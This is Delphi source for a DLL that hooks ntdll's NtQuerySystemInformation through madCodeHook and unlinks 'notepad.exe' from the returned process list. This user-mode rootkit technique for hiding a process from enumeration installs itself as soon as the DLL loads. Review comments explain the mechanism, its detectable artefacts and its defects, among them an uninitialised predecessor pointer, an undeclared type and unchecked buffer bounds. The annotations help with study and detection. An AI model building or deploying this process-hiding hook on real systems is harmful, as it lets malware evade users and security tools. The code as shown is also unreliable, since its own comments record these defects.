
Hideprocessnt

{ Process Hiding for NT.

  NOTE(review): this library installs a user-mode hook on ntdll!NtQuerySystemInformation
  (through the third-party madCodeHook library, HookCode below) and rewrites the caller's
  result buffer so that process records whose image name is "notepad.exe" are unlinked
  from the information-class-5 list. Any enumerator in the hooked process that relies on
  this call will not see the unlinked record; enumerators that use a different source
  still will. From a defensive standpoint, the observable artefacts are the modified
  ntdll export in the hooked process and the disagreement between enumeration views. }
library HookProcessEnumeration2;

{$IMAGEBASE $57000000}

uses Windows, SysUtils, madCodeHook;

type
  PProcessInfo = ^TProcessInfo;
  // Hand-written layout of the per-process record returned for information class 5.
  // Only dwOffset, pszProcessName and the record's base address are used below; the
  // dwUnkownN fields exist to reach the right byte offsets. The layout is undocumented
  // and is not stable across Windows versions, so this declaration is only valid for
  // whichever build it was written against -- on another build the offsets, and thus
  // the pointers read from them, will be wrong.
  TProcessInfo = record
    dwOffset : dword;                  // byte offset to the next record; 0 marks the last entry
    dwThreadCount : dword;
    dwUnkown1 : array[0..5] of dword;
    ftCreationTime : TFileTime;
    dwUnkown2 : dword;
    dwUnkown3 : dword;
    dwUnkown4 : dword;
    dwUnkown5 : dword;
    dwUnkown6 : dword;
    pszProcessName : PWideChar;        // image name, read through WideCharToString below
    dwBasePriority : dword;
    dwProcessID : dword;
    dwParentProcessID : dword;
    dwHandleCount : dword;
    dwUnkown7 : dword;
    dwUnkown8 : dword;
    dwVirtualBytesPeak : dword;
    dwVirtualBytes : dword;
    dwPageFaults : dword;
    dwWorkingSetPeak : dword;
    dwWorkingSet : dword;
    dwUnkown9 : dword;
    dwPagedPool : dword;               // kbytes
    dwUnkown10 : dword;
    dwNonPagedPool : dword;            // kbytes
    dwPageFileBytesPeak : dword;
    dwPageFileBytes : dword;
    dwPrivateBytes : dword;
    dwUnkown11 : dword;
    dwUnkown12 : dword;
    dwUnkown13 : dword;
    dwUnkown14 : dword;
    ThreadInfo : PThreadInfo;          // thread list; PThreadInfo is not declared in this listing
  end;

var
  // Trampoline to the original NtQuerySystemInformation; filled in by HookCode.
  NtQuerySystemInformationNextHook: function(dt : dword; buf : pointer; bufsize : dword; retlen : pointer) : dword; stdcall;

// Import of the real export so its address can be passed to HookCode.
function NtQuerySystemInformation(dt : dword; buf : pointer; bufsize : dword; retlen : pointer) : dword; stdcall; external 'ntdll.dll';

// Replacement for NtQuerySystemInformation. Calls the original first, then, only for
// information class 5 and only on success, walks the returned record chain in the
// caller's buffer (buf) and adjusts dwOffset links so that records named "notepad.exe"
// are skipped. Parameters are passed straight through; retlen is never adjusted here,
// so the reported size still counts the unlinked bytes.
function NtQuerySystemInformationCallbackProc(dt : dword; buf : pointer; bufsize : dword; retlen : pointer) : dword; stdcall;
type
  PBA = ^TBA;
  TBA = array[0..1000000] of byte;   // byte-indexable view of buf; the bound is nominal, bufsize is never checked
var
  tmpbuf: PBA;
  Pinfo,LastPinfo : PProcessInfo;    // current record and the last record that was kept
  cp: DWORD;                         // byte position of the current record within buf
  curproc:string;
begin
  Result := NtQuerySystemInformationNextHook(dt,buf,bufsize,retlen);
  if dt<>5 then exit;                // class 5 is the process list; everything else passes through
  if result<>0 then exit;            // do not touch the buffer on a failed call
  cp := 0;
  tmpbuf := buf;
  // NOTE(review): LastPinfo is not assigned before the loop; the writes through it below
  // assume the first record never matches. Every write lands in the caller's buffer, and
  // the walk trusts dwOffset without bounds-checking against bufsize.
  Repeat
    Pinfo := PProcessInfo(@tmpbuf[cp]);
    curproc:=WideCharToString(pinfo^.pszProcessName);
    if lowercase(curproc)='notepad.exe' then
    begin
      if pinfo^.dwOffset=0 then
      begin
        // matching record is the last one: make the previous record the terminator
        LastPinfo^.dwOffset:=0;exit;
      end
      else
        // matching record is in the middle: point the previous record past it
        LastPinfo^.dwOffset:=LastPinfo^.dwOffset+pinfo.dwOffset;
    end
    else
    begin
      LastPinfo:=Pinfo;              // record kept; remember it as the predecessor
    end;
    cp := cp + Pinfo^.dwOffset;
  until Pinfo^.dwOffset = 0;
end;

// Library initialization: install the hook as soon as the DLL is loaded into a process.
begin
  HookCode(@NtQuerySystemInformation, @NtQuerySystemInformationCallbackProc, @NtQuerySystemInformationNextHook);
end.